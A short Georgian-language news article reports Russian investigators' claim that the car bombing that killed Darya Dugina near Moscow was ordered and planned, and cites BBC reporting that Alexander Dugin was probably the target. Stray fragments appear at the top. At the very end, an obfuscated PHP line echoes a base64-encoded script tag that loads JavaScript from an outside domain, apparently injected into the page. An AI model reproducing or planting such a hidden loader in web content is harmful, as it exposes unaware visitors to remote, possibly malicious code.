celsiusi
ავერსი შნაიდერი
რუსეთის საგამოძიებო კომიტეტში აცხადებენ, რომ მოპოვებული მონაცემების გათვალისწინებით, დანაშაული, რომლის შედეგადაც დარია დუგინა დაიღუპა, წინასწარ იყო შეკვეთილი და დაგეგმილი.
 
ინფორმაციას რუსული მედია ავრცელებს.
 
„ამ დროისთვის უკვე დადგინდა, რომ ასაფეთქებელი მოწყობილობა მძღოლის მხარეს მანქანის ძირზე იყო მიმაგრებული. დარია დუგინა, რომელიც საჭესთან იმყოფებოდა, ადგილზე გარდაიცვალა“, – განაცხადეს უწყებაში.
 
მედია წერს, რომ შემთხვევის ადგილზე მუშაობას აგრძელებენ საგამოძიებო კომიტეტის კრიმინალისტიკის მთავარი სამმართველოს გამომძიებლები და სპეციალისტები.
 
ცნობისთვის, როგორც „ბიბისი“ წერს, რუსეთის პრეზიდენტის, ვლადიმერ პუტინის ახლო მოკავშირის, ალექსანდრ დუგინის შვილი მოსკოვთან ახლოს, მანქანაში ააფეთქეს. „ბიბისი“ წერს, რომ სავარაუდოდ აფეთქების სამიზნე ალექსანდერ დუგინი იყო, რომელიც ცნობილია როგორც პუტინის მოკავშირე და მას მოიხსენიებენ როგორც „პუტინის ტვინი".
381
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");